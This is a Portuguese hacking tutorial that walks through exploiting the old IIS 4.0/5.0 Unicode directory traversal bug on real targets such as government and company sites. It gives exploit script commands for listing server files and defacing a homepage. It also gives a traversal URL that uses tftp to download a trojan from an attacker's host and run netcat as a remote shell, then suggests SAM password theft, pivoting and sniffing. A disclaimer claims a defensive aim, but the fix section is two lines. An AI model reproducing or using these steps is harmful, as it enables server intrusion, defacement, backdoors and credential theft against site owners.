Dicas para invadir servidores

Todas as dicas contidas nesta
área são totalmente de sua responsabilidade, estão aqui apenas com o intuito de
trazer as informações para que vocês internautas tenham um conhecimento além do
normal e saiba como se defender na internet, portanto eu não me responsabilizo
por qualquer ato imbecil que você venha a fazer com as informações aqui
contidas.




Tentaremos aqui desenvolver um paper explicando
passo-à-passo de como um "hacker" faz para obter acesso num servidor rodando
WindowsNT Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal
vulnerável e como corrigir essa vulnerabilidade.


Obs: esta
técnica já é bem
velhinha



Segue abaixo as versões dos
Sistemas Operacionais e Programas Vulneráveis.


::Vulnerável:

::Microsoft IIS 5.0

+Microsoft Windows NT 2000

::Microsoft IIS 4.0

- Microsoft Windows NT 4.0

+Microsoft BackOffice 4.5

- Microsoft Windows NT 4.0

+Microsoft BackOffice 4.0


- Microsoft Windows NT 4.0


Vamos ao que interessa



INDICE


1º Procurar por um host vulnerável.

2º Testar se o host é realmente vulnerável.

2.1 Fazer um scanner no host alvo.

2.2 Testar o exploit no host alvo antes mesmo de verificar se ele está
vulnerável ou não.

3º Listar os arquivos e pastas contidos no servidor vulnerável.


4º Alterar o conteúdo do site do host vulnerável.

5º TÉCNICAS DE HAXORS. ;-)

6º AGORA VOCÊ É UM HACKER. OU NÃO?

7º MAIS EXPLOITS.

8º CORREÇÃO.



1º) Procurar por um host
vulnerável


Geralmente os hosts mais
procurados são os mais conhecidos, como sites do governo e empresas
nacionalmente e mundialmente conhecidas. Mas se você quer dar uma de "hacker"
pegue uma hp bem fulerinha..


2º) Testar se o host é
realmente vulnerável.



Existem duas maneiras básicas.


2.1 Fazer um scanner no host
alvo.



Existem scanners que vasculham
servidores e serviços que estão sendo executados. Esses scanners verificam se há
algum serviço vulnerável, que ainda não foi corrigido. Para testar essa
vulnerabilidade existem scanners tanto para windows quanto pra linux.

Para windows você pode obter o

SSS - Security Shadow
Scanner (já vem com seu crack dentro do .zip)

Para linux um scanner feito perl que quando encontra um HOST vulnerável ele
inidica o url de onde pode-se obter o exploit para explorar essa
vulnerabilidade.



Segue abaixo como usá-los:


- SSS (Security Shadow Scanner)
Não há mistério de como utilizá-lo. Basta preencher o campo com o IP ou HOST do
alvo e iniciar o "scanneamento". Quando encontrar ele colocará em vermelho um
aviso dizendo que o HOST está vulnerável ao msdac.dll.



- unicheck.pl - Veja o que
acontece quando ele acha um HOST vulnerável.

perl unicheck.pl XXX.XXX.XXX.XXX:80

- Pode ver que ele avisa que o host é vulnerável. THIS HOST IS VULNERABLE :-).

Avisa onde encotrar o exploit para explorar a vulnerabilidade.
http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl



2.2 Testar o exploit no host alvo
antes mesmo de verificar se ele está vulnerável ou não..


Agora iremos testar o exploit no
nosso host alvo.

"dir c:inetpub"



Como pode ver acima, foi listado os diretórios dentro do diretório c:inetpub.
Assim o "hacker" tem acesso à todo o seus arquivos, podendo assim alterar o site
da empresa que infelizmente não tem uma equipe separada da equipe de
administração responsável pela segurança da empresa, que não só se limita à
segurança virtual. Como o "hacker" pode ler o diretório "c:inetpub" ele também
pode ter acesso ao diretório padrão do website "c:inetpubwwwroot" ou outro
diretório que hospeda os arquivos do site da empresa como pode ver abaixo.


3º) Listar os arquivos e pastas
contidos no servidor vulnerável.


Iremos listar todos os arquivos e
diretórios dentro de uma determinada pasta.>

perl xpu.pl www.host-alvo.com.br:80 "dir c:inetpubwwwroot"


4º) Alterar o conteúdo do site
do host vulnerável.



perl unicodexecute.pl www.host-alvo.com.br:80
''echo SITE HACKED BY Remote Menace!! > c:\inetpubwwwroot\index.htm''

Pronto... agora você alterou o site da empresa que encontrou vulnerável. Quando
for acessar o site da empresa que encontrou vulnerável você encontrará a
seguinte mensagem no site:

" SITE HACKED BY Remote Menace! "

É assim que praticamente o mundo inteiro está sendo invadido. :-)


5º) TÉCNICAS DE HAXORS


Bom..

. agora varia de pessoa para pessoa, conheceimento para conhecimento,
criatividade para criatividade. O jeito de como você pode obter maiores
informações a partir da exploração da vulnerabilidade do unicode só dependerá de
você.




Para adiantar o seu lado, vamos adiantar alguma coisa. Com o acesso já garantido
ao servidor você poderá fazer o que bem entende. Geralmente os "hackers" do
Brasil se contentam em alterar a pagina e esquecer de "backdoorizar" as máquinas
que eles conseguem invadir. De certa forma isso é muito bom, pois o que parece é
que eles querem somente manifestar o seu descontentamento com o governo e a
administração que o Brasil tem. Não que isso seja certo ou que concordamos com o
que eles fazem. Infelizmente as pessoas ainda não tem conhecimento do que
acontece e o que realmente é o underground e mesmo o que é um HACKER no sentido
profundo.



Para você obter um maior acesso à
rede, ou seja, conseguir acesso à outras máquinas, outros tipos de acessos,
abrir um terminal remoto e até mesmo continuar tendo acesso à máquina, você
precisa fazer algumas coisas, mesmo porque o servidor não ficará vulnerável para
sempre.



Você pode utilizar ferramentas que já vem instaladas por default (padrão) no
Windows NT e 2000 para "facilitar" a sua vida. A dica que daremos aqui é
utilizar o TFTP para poder abrir um terminal remoto posteriormente e continuar
tendo acesso à máquina mesmo depois de sua correção.


/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"

+ip.de.onde.esta.o.trojan+GET+trojan.exe+c:\winnt\system32\trojan.exe

.

agora rode o trojan com:


/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe



Bom...

Agora você instalou o nc no servidor, poderá abrir um terminal remoto no Windows
NT, tendo acesso completo ao sistema.



Como foi dito antes, depende de você continuar tendo acesso ao servidor. E essas
técnicas estão sendo aprimoradas a cada dia. Você acha que pode conseguir ter
acesso ao arquivo SAM? Você pode descriptografar as senhas dos usuários? Você
pode utilizar o terminal que você abriu e tentar ter acesso à outras máquinas
para não haver um reastreamento direto para sua máquina?Você pode conseguir
acesso à rede interna (10.0.0.0 por exemplo) se houver? Você pode sniffar a rede
a partir dessa máquina e obter acesso às outras máquinas?



Como pode ver... pode se fazer MUITA coisa além de modificar uma página apartir
de um bug que CENTENAS de servidores ainda continuam vulneráveis por todo o
mundo.


6º) AGORA VOCÊ É UM HACKER. OU
NÃO?



Você se considera um hacker?


Bom...


7º) MAIS EXPLOITS.


Mais exploits:





iis-zang.c



iis-zang.exe




iis-zang.obsd



iis-zang.linux



unicodecheck.pl



unicodexecute.pl




unicodexecute2.pl





8º) CORREÇÃO.



Contratar um Security Officer
para cuidar da segurança da sua empresa.

Se manter o mais atualizado possível.



Internet Informatio Server 4.0




http://www.microsoft.com/ntserver/nts/downloads/



Internet Informatio Server 5.0



http://www.microsoft.com/ntserver/nts/downloads/